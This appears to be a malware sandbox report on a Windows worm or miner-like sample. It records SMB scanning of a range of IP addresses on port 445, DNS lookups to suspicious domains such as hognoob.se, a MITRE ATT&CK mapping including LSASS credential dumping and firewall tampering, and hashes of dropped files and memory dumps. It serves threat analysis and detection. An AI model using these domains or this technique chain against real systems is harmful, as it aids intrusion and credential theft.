181.215.1.78:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.79:445

btpbguneu.exe

104 B
40 B
2
1
181.215.1.80:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.81:445

btpbguneu.exe

104 B
40 B
2
1
181.215.1.82:445

btpbguneu.exe

104 B
40 B
2
1
181.215.1.83:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.84:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.85:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.86:445

btpbguneu.exe

104 B
40 B
2
1
181.215.1.87:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.88:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.89:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.90:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.91:445

btpbguneu.exe

104 B
40 B
2
1
181.215.1.92:445

btpbguneu.exe

104 B
40 B
2
1
181.215.1.93:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.94:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.95:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.96:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.97:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.98:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.99:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.100:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.101:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.102:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.103:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.104:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.105:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.106:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.107:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.108:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.109:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.110:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.112:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.111:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.113:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.114:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.115:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.116:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.117:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.118:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.119:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.120:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.121:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.122:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.123:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.124:445

btpbguneu.exe

52 B
1
181.215.1.125:445

btpbguneu.exe

52 B
1
181.215.1.126:445

btpbguneu.exe

104 B
2
181.215.1.127:445

btpbguneu.exe

52 B
1
181.215.1.128:445

btpbguneu.exe

104 B
2
181.215.1.129:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.130:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.131:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.132:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.133:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.134:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.135:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.136:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.137:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.138:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.139:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.140:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.141:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.142:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.143:445

btpbguneu.exe

104 B
40 B
2
1
181.215.1.144:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.145:445

btpbguneu.exe

104 B
40 B
2
1
181.215.1.146:445

btpbguneu.exe

104 B
40 B
2
1
181.215.1.147:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.148:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.149:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.150:445

btpbguneu.exe

104 B
40 B
2
1
181.215.1.151:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.152:445

btpbguneu.exe

104 B
40 B
2
1
181.215.1.153:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.154:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.155:445

btpbguneu.exe

104 B
40 B
2
1
181.215.1.156:445

btpbguneu.exe

104 B
40 B
2
1
181.215.1.157:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.158:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.159:445

btpbguneu.exe

104 B
40 B
2
1
181.215.1.160:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.161:445

btpbguneu.exe

104 B
40 B
2
1
181.215.1.162:445

btpbguneu.exe

104 B
40 B
2
1
181.215.1.163:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.164:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.165:445

btpbguneu.exe

104 B
40 B
2
1
181.215.1.166:445

btpbguneu.exe

104 B
40 B
2
1
181.215.1.167:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.168:445

btpbguneu.exe

104 B
40 B
2
1
181.215.1.169:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.170:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.171:445

btpbguneu.exe

104 B
40 B
2
1
181.215.1.172:445

btpbguneu.exe

104 B
40 B
2
1
181.215.1.173:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.174:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.175:445

btpbguneu.exe

104 B
40 B
2
1
181.215.1.176:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.177:445

btpbguneu.exe

104 B
40 B
2
1
181.215.1.178:445

btpbguneu.exe

104 B
40 B
2
1
181.215.1.179:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.180:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.181:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.182:445

btpbguneu.exe

104 B
40 B
2
1
181.215.1.183:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.184:445

btpbguneu.exe

104 B
40 B
2
1
181.215.1.185:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.186:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.187:445

btpbguneu.exe

104 B
40 B
2
1
181.215.1.188:445

btpbguneu.exe

104 B
40 B
2
1
181.215.1.189:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.190:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.191:445

btpbguneu.exe

104 B
40 B
2
1
181.215.1.192:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.193:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.194:445

btpbguneu.exe

104 B
40 B
2
1
181.215.1.195:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.196:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.197:445

btpbguneu.exe

104 B
40 B
2
1
181.215.1.198:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.199:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.200:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.201:445

btpbguneu.exe

104 B
80 B
2
2
181.215.1.202:445

btpbguneu.exe

104 B
80 B
2
2

8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

186 B
362 B
3
3

DNS Request

8.8.8.8.in-addr.arpa

DNS Request

pxi.hognoob.se

DNS Request

pxi.hognoob.se
8.8.8.8:53

133.211.185.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

133.211.185.52.in-addr.arpa
8.8.8.8:53

182.129.81.91.in-addr.arpa

dns

72 B
147 B
1
1

DNS Request

182.129.81.91.in-addr.arpa
8.8.8.8:53

20.160.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

20.160.190.20.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

uio.hognoob.se

dns

ktlbbtb.exe

60 B
136 B
1
1

DNS Request

uio.hognoob.se
8.8.8.8:53

uio.heroherohero.info

dns

ktlbbtb.exe

67 B
130 B
1
1

DNS Request

uio.heroherohero.info
8.8.8.8:53

yxw.hognoob.se

dns

ktlbbtb.exe

60 B
136 B
1
1

DNS Request

yxw.hognoob.se
8.8.8.8:53

149.220.183.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

149.220.183.52.in-addr.arpa
8.8.8.8:53

200019.ip138.com

dns

ktlbbtb.exe

62 B
160 B
1
1

DNS Request

200019.ip138.com

DNS Response

59.57.14.11

110.81.155.137

59.57.13.133

59.57.13.182

110.81.155.138
8.8.8.8:53

haq.hognoob.se

dns

tyxtue.exe

60 B
136 B
1
1

DNS Request

haq.hognoob.se
8.8.8.8:53

pxi.hognoob.se

dns

btcbnp.exe

60 B
136 B
1
1

DNS Request

pxi.hognoob.se
8.8.8.8:53

200.163.202.172.in-addr.arpa

dns

74 B
160 B
1
1

DNS Request

200.163.202.172.in-addr.arpa
8.8.8.8:53

18.31.95.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

18.31.95.13.in-addr.arpa
8.8.8.8:53

75.117.19.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

75.117.19.2.in-addr.arpa
8.8.8.8:53

pxi.hognoob.se

dns

btcbnp.exe

60 B
136 B
1
1

DNS Request

pxi.hognoob.se
8.8.8.8:53

pxi.hognoob.se

dns

btcbnp.exe

60 B
136 B
1
1

DNS Request

pxi.hognoob.se
8.8.8.8:53

pxi.hognoob.se

dns

btcbnp.exe

60 B
136 B
1
1

DNS Request

pxi.hognoob.se
8.8.8.8:53

haq.hognoob.se

dns

tyxtue.exe

60 B
136 B
1
1

DNS Request

haq.hognoob.se
8.8.8.8:53

pxi.hognoob.se

dns

btcbnp.exe

60 B
136 B
1
1

DNS Request

pxi.hognoob.se
8.8.8.8:53

pxx.hognoob.se

dns

btcbnp.exe

60 B
136 B
1
1

DNS Request

pxx.hognoob.se
8.8.8.8:53

haq.hognoob.se

dns

tyxtue.exe

60 B
136 B
1
1

DNS Request

haq.hognoob.se
8.8.8.8:53

pxi.hognoob.se

dns

btcbnp.exe

120 B
272 B
2
2

DNS Request

pxi.hognoob.se

DNS Request

pxx.hognoob.se
8.8.8.8:53

pxx.hognoob.se

dns

btcbnp.exe

60 B
136 B
1
1

DNS Request

pxx.hognoob.se
8.8.8.8:53

172.210.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.210.232.199.in-addr.arpa
8.8.8.8:53

pxi.hognoob.se

dns

btcbnp.exe

60 B
136 B
1
1

DNS Request

pxi.hognoob.se
8.8.8.8:53

pxx.hognoob.se

dns

btcbnp.exe

60 B
136 B
1
1

DNS Request

pxx.hognoob.se
8.8.8.8:53

pxx.hognoob.se

dns

btcbnp.exe

60 B
136 B
1
1

DNS Request

pxx.hognoob.se
8.8.8.8:53

pxi.hognoob.se

dns

btcbnp.exe

60 B
136 B
1
1

DNS Request

pxi.hognoob.se
8.8.8.8:53

pxx.hognoob.se

dns

btcbnp.exe

60 B
136 B
1
1

DNS Request

pxx.hognoob.se
8.8.8.8:53

pxi.hognoob.se

dns

btcbnp.exe

60 B
136 B
1
1

DNS Request

pxi.hognoob.se
8.8.8.8:53

pxx.hognoob.se

dns

btcbnp.exe

60 B
136 B
1
1

DNS Request

pxx.hognoob.se
8.8.8.8:53

pxi.hognoob.se

dns

btcbnp.exe

60 B
136 B
1
1

DNS Request

pxi.hognoob.se
8.8.8.8:53

haq.hognoob.se

dns

tyxtue.exe

60 B
136 B
1
1

DNS Request

haq.hognoob.se
8.8.8.8:53

pxi.hognoob.se

dns

btcbnp.exe

60 B
136 B
1
1

DNS Request

pxi.hognoob.se
8.8.8.8:53

ifconfig.me

dns

ktlbbtb.exe

57 B
73 B
1
1

DNS Request

ifconfig.me

DNS Response

34.160.111.145
8.8.8.8:53

r11.o.lencr.org

dns

ktlbbtb.exe

61 B
176 B
1
1

DNS Request

r11.o.lencr.org

DNS Response

88.221.135.105

88.221.135.115

88.221.134.137

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

OS Credential Dumping

T1003

LSASS Memory

T1003.001

Discovery

Network Service Discovery

T1046

Network Share Discovery

T1135

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\SysWOW64\Packet.dll

Filesize
95KB

MD5
86316be34481c1ed5b792169312673fd

SHA1
6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

SHA256
49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

SHA512
3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

Download Submit
C:\Windows\SysWOW64\wpcap.dll

Filesize
275KB

MD5
4633b298d57014627831ccac89a2c50b

SHA1
e5f449766722c5c25fa02b065d22a854b6a32a5b

SHA256
b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

SHA512
29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

Download Submit
C:\Windows\TEMP\mpbivectb\2132.dmp

Filesize
4.1MB

MD5
16434ec6c33c0d2daed001b689ec5d56

SHA1
c9d42c4465303aff5803e10d412559b581ae1b7b

SHA256
06c125710f410c5160c08c38d7600105c8a1f3ac979d913646db6e4933cd23cf

SHA512
ffbc33de8c109f0668f363efbd88588632f1aacf2fecb080f522b64a05c957914cde9d1272ec3cb0e21972f27641cb5890329bae4cac15078d65dcc01058e06e

Download Submit
C:\Windows\TEMP\mpbivectb\2524.dmp

Filesize
8.6MB

MD5
1c8e28f373f868e3431be1872e6f63f1

SHA1
72f44e7c1e6a01fe0849efa4e854e97d07de05ad

SHA256
bf84d420db0df8d98958d21205807dfb884d3bed6cb84ba34e0fff6f9f274598

SHA512
b1bc8a518c8790d5b4bd7c87175d13e3728e2f08a5f4106629f8fd0e3a50c89f38c126ef4ca7b0afcc6928ca5b1fea038c4a62f865264d8167fa5e6372ca480e

Download Submit
C:\Windows\TEMP\mpbivectb\2556.dmp

Filesize
3.4MB

MD5
74ecaa3024950a5cd7af9163147d13a1

SHA1
9cdf0dd6f7535ba4cc3ffe9430a6e896430df9b5

SHA256
bab33f66c557833ef3f165dfab4b41dc8c42b9644e8bba5a6f12edf117ed1106

SHA512
491b8c6351b806559894e20db0bfad119c5407e0e3f5936e2003a19484a24ed6ded8eb3cda3dd73e89d09a39fd318dcba398cec37bf7713b7a965dfa3cdfa0c4

Download Submit
C:\Windows\TEMP\mpbivectb\2684.dmp

Filesize
3.0MB

MD5
aeb4a5c0998f52ebea76561aa6fb6666

SHA1
f5b6e4d107e1587252e4e2f022c2017680176767

SHA256
d6f3ceefbc97c4736e007d72a3a183a19e66b0b5275675a11fb5ea7de29bf8af

SHA512
80d3d833c3eefc170fe0b13325216edfca001602d01cad4dc059b5362f27c0518d03d4e572b9bc60f0fc56782e935a1919224724637f8ea0e342c9e75a3dd84b

Download Submit
C:\Windows\TEMP\mpbivectb\2888.dmp

Filesize
7.5MB

MD5
667322c1b0661d74b7a4c96a6cb151dc

SHA1
205224696858b5071aedc1c2a11bbe120b8afe71

SHA256
9a6fdaebb490f2de9b054f9bc085ddcd934de9edfbfea7f1db303978c900790c

SHA512
91b21aea088f12d3120bf91bad6b386208d7100eff2cce9473f2ff380bfc736a25973444d6769686eaa21c32bcef7aec4970cb0c4a4d00309b5005417e0e3a68

Download Submit
C:\Windows\TEMP\mpbivectb\3160.dmp

Filesize
26.0MB

MD5
1f8dc72eb976281b84f636675e6e6b4a

SHA1
849341484edb5878151f3c02d9f2122fa363af1e

SHA256
8bf1f8bc54e0414f84e47898bfa3a684f8da238dac46dd54fe4ba109f1e3bf64

SHA512
ec88d7dfe5b852c91948f3ffc16f7a630c32ea387c29f9ac95a28b150c221ff40abbdbbb02b3a1201589d166aa035793f1a2e1a2ac26368bfa6bf49fb8a8b847

Download Submit
C:\Windows\TEMP\mpbivectb\3168.dmp

Filesize
806KB

MD5
b4050c58efdac7133122ec7dbc019f62

SHA1
255f65244d2bc7865f07a89ad605b73213a7f527

SHA256
6b9ade8a975e48b5284a5a47a88c1d7f96c1486648e603de83602793c19133f1

SHA512
7e49336a18bf83229363d9e5d9ede7c0a971eda33dbeb31d9811d35581caf72135daac6d2db7ea45cc7e7f48c51c17ef6ef5427280d5d24c157b7b22ce210490

Download Submit
C:\Windows\TEMP\mpbivectb\336.dmp

Filesize
30.0MB

MD5
a094c533a506b8a986e0f132c6c32db6

SHA1
f0f40abc0325693f03df3c3b8040f580f5f04323

SHA256
31b11948f1f3519ff8dd64aabccb54c78befffeeb0d4e530a8c8c9502d790748

SHA512
aa115026d8e9d7201f195ac13ce66756d216a86d43ee070571aec98066222c96e8217e33fd9a7d32ea6144030571851acf242c782171fea4c589e7c30f0f7f73

Download Submit
C:\Windows\TEMP\mpbivectb\3968.dmp

Filesize
20.7MB

MD5
483eb0b514d91afc69f1988796a2c982

SHA1
b6da41446280686bf0adf68fbfadc2b048a54c13

SHA256
ed9e29403fc904c1ca49f375e7fb9e8cfdcc0c72bc415c4f773a6aa8e13b5dcc

SHA512
28b2da3d4ce533762b7d9280cf1d0ce24426f6315ec03479c2eaea06861273a5190633297e38545cbee95988dc2fc705a527ee64711f0c094b2e8a6e39a789ac

Download Submit
C:\Windows\TEMP\mpbivectb\4056.dmp

Filesize
4.3MB

MD5
420491c24e1004f75e10f5677ccea3da

SHA1
6decf6c4eb0ebab3c4086c0bb2ed0be2a9d157fe

SHA256
ac7b19387e4202e508aeac876ad888d8cd778b3f0d52cc5fbadfe6ad24a700b5

SHA512
cd58ceafc9214acd1e0c6d2880b8e67368b9b4ba698b93e2f0d9bfc7db11af9cf96889629dd6fcd25e83de76e64c7a6a09dda8f393d9144d7fbd11635e81dceb

Download Submit
C:\Windows\TEMP\mpbivectb\4200.dmp

Filesize
1.2MB

MD5
8bb1885f879c42de870362c68c7150d0

SHA1
8371573218797dfcfd7a6e914121f5da97efdbc4

SHA256
32e5b51897db12ed2084269f81f608ff60139362c066d68a04e19b00d573ba2c

SHA512
f2c9f0dfc1dfbe824b151ac4d60188c7588cc390f9589335a7abd2368a09016f079eefe3c9b099d07b7144601059a244347cf4910427ee68b83e8f3eaebd9882

Download Submit
C:\Windows\TEMP\mpbivectb\680.dmp

Filesize
44.0MB

MD5
a41eca1a2b2bfad58b2c6998f770251e

SHA1
f8bb037da9e82b978798fe674d236a8e8066fe08

SHA256
e2c26a05b3763058763883ec9799f04ceba01f5dd96d8ab1a27d549278b3d7a5

SHA512
981fbfb58ede591f2b29a6cff61fa0b916d418ef324f0c168dbe787eac55b25a78adb57aa133fb33ae4905714fb565bb87fb36a30438800929eec88a5c563ee7

Download Submit
C:\Windows\TEMP\mpbivectb\776.dmp

Filesize
3.3MB

MD5
8d5dd0278840f68dad1963355c9ce427

SHA1
c101cb754885462a499f1d409290a9e1709f139d

SHA256
ccf67bcee33b05d786c9f06ee3a4140062def273d5fdf0e16c81659d52a14e16

SHA512
7da1a935063efb68fd9c24ddcfc686a3ab4424dc838f1145265ede66b30d6568ff61e9ee556ad41c3d6a29171f3a5be4558e7d015e011aa78b2b0b182805ed5b

Download Submit
C:\Windows\TEMP\uivtbcilg\config.json

Filesize
693B

MD5
f2d396833af4aea7b9afde89593ca56e

SHA1
08d8f699040d3ca94e9d46fc400e3feb4a18b96b

SHA256
d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

SHA512
2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

Download Submit
C:\Windows\Temp\mpbivectb\yubiiieib.exe

Filesize
126KB

MD5
e8d45731654929413d79b3818d6a5011

SHA1
23579d9ca707d9e00eb62fa501e0a8016db63c7e

SHA256
a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

SHA512
df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

Download Submit
C:\Windows\Temp\nss17AC.tmp\System.dll

Filesize
11KB

MD5
2ae993a2ffec0c137eb51c8832691bcb

SHA1
98e0b37b7c14890f8a599f35678af5e9435906e1

SHA256
681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

SHA512
2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

Download Submit
C:\Windows\Temp\nss17AC.tmp\nsExec.dll

Filesize
6KB

MD5
b648c78981c02c434d6a04d4422a6198

SHA1
74d99eed1eae76c7f43454c01cdb7030e5772fc2

SHA256
3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

SHA512
219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

Download Submit
C:\Windows\Temp\uivtbcilg\btcbnp.exe

Filesize
343KB

MD5
2b4ac7b362261cb3f6f9583751708064

SHA1
b93693b19ebc99da8a007fed1a45c01c5071fb7f

SHA256
a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

SHA512
c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

Download Submit
C:\Windows\Temp\xohudmc.exe

Filesize
72KB

MD5
cbefa7108d0cf4186cdf3a82d6db80cd

SHA1
73aeaf73ddd694f99ccbcff13bd788bb77f223db

SHA256
7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

SHA512
b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

Download Submit
C:\Windows\izcmeubg\ktlbbtb.exe

Filesize
9.1MB

MD5
f54565563043d95dea3484fb31941c1e

SHA1
fa2e18742e57f429a01b04e62e81f101a77a53d3

SHA256
15ebc97728eeaf59b10b2c110713a2839b90a77f91fae44946c040ef920b5565

SHA512
d39de188e123bb0240e34cdd7b424f96bf1f9f8dc36d2bdfd722c56ff95f3b2bf741705c10423e9312ac335990c93b69c7d75a1f2062ded1d4209d32bc632948

Download Submit
C:\Windows\mpbivectb\Corporate\vfshost.exe

Filesize
381KB

MD5
fd5efccde59e94eec8bb2735aa577b2b

SHA1
51aaa248dc819d37f8b8e3213c5bdafc321a8412

SHA256
441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

SHA512
74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

Download Submit
C:\Windows\mpbivectb\iuzcjcmlt\tzmttvjbt.exe

Filesize
332KB

MD5
ea774c81fe7b5d9708caa278cf3f3c68

SHA1
fc09f3b838289271a0e744412f5f6f3d9cf26cee

SHA256
4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

SHA512
7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

Download Submit
C:\Windows\mpbivectb\iuzcjcmlt\wpcap.exe

Filesize
424KB

MD5
e9c001647c67e12666f27f9984778ad6

SHA1
51961af0a52a2cc3ff2c4149f8d7011490051977

SHA256
7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d

SHA512
56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
1KB

MD5
c838e174298c403c2bbdf3cb4bdbb597

SHA1
70eeb7dfad9488f14351415800e67454e2b4b95b

SHA256
1891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53

SHA512
c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376

Download Submit
memory/60-231-0x00007FF78FC10000-0x00007FF78FC6B000-memory.dmp

Filesize
364KB

Download
memory/528-244-0x0000000000EB0000-0x0000000000EC2000-memory.dmp

Filesize
72KB

Download
memory/964-234-0x00007FF78FC10000-0x00007FF78FC6B000-memory.dmp

Filesize
364KB

Download
memory/1304-207-0x00007FF78FC10000-0x00007FF78FC6B000-memory.dmp

Filesize
364KB

Download
memory/1324-195-0x00007FF78FC10000-0x00007FF78FC6B000-memory.dmp

Filesize
364KB

Download
memory/1520-181-0x00007FF679AC0000-0x00007FF679BE0000-memory.dmp

Filesize
1.1MB

Download
memory/1520-209-0x00007FF679AC0000-0x00007FF679BE0000-memory.dmp

Filesize
1.1MB

Download
memory/1520-298-0x00007FF679AC0000-0x00007FF679BE0000-memory.dmp

Filesize
1.1MB

Download
memory/1520-291-0x00007FF679AC0000-0x00007FF679BE0000-memory.dmp

Filesize
1.1MB

Download
memory/1520-177-0x00007FF679AC0000-0x00007FF679BE0000-memory.dmp

Filesize
1.1MB

Download
memory/1520-290-0x00007FF679AC0000-0x00007FF679BE0000-memory.dmp

Filesize
1.1MB

Download
memory/1520-281-0x00007FF679AC0000-0x00007FF679BE0000-memory.dmp

Filesize
1.1MB

Download
memory/1520-280-0x00007FF679AC0000-0x00007FF679BE0000-memory.dmp

Filesize
1.1MB

Download
memory/1520-245-0x00007FF679AC0000-0x00007FF679BE0000-memory.dmp

Filesize
1.1MB

Download
memory/1520-167-0x0000025E07890000-0x0000025E078A0000-memory.dmp

Filesize
64KB

Download
memory/1520-196-0x00007FF679AC0000-0x00007FF679BE0000-memory.dmp

Filesize
1.1MB

Download
memory/1520-232-0x00007FF679AC0000-0x00007FF679BE0000-memory.dmp

Filesize
1.1MB

Download
memory/1520-164-0x00007FF679AC0000-0x00007FF679BE0000-memory.dmp

Filesize
1.1MB

Download
memory/1520-218-0x00007FF679AC0000-0x00007FF679BE0000-memory.dmp

Filesize
1.1MB

Download
memory/1940-8-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/2420-188-0x00007FF78FC10000-0x00007FF78FC6B000-memory.dmp

Filesize
364KB

Download
memory/2436-229-0x00007FF78FC10000-0x00007FF78FC6B000-memory.dmp

Filesize
364KB

Download
memory/2512-78-0x0000000001560000-0x00000000015AC000-memory.dmp

Filesize
304KB

Download
memory/2596-174-0x00007FF78FC10000-0x00007FF78FC6B000-memory.dmp

Filesize
364KB

Download
memory/2876-203-0x00007FF78FC10000-0x00007FF78FC6B000-memory.dmp

Filesize
364KB

Download
memory/2956-221-0x00007FF78FC10000-0x00007FF78FC6B000-memory.dmp

Filesize
364KB

Download
memory/3012-0-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/3012-4-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/3508-199-0x00007FF78FC10000-0x00007FF78FC6B000-memory.dmp

Filesize
364KB

Download
memory/3676-136-0x00007FF79CCB0000-0x00007FF79CD9E000-memory.dmp

Filesize
952KB

Download
memory/3676-161-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/3676-138-0x00007FF79CCB0000-0x00007FF79CD9E000-memory.dmp

Filesize
952KB

Download
memory/3676-150-0x0000000010000000-0x0000000010008000-memory.dmp

Filesize
32KB

Download
memory/4396-216-0x00007FF78FC10000-0x00007FF78FC6B000-memory.dmp

Filesize
364KB

Download
memory/4424-212-0x00007FF78FC10000-0x00007FF78FC6B000-memory.dmp

Filesize
364KB

Download
memory/4520-179-0x00007FF78FC10000-0x00007FF78FC6B000-memory.dmp

Filesize
364KB

Download
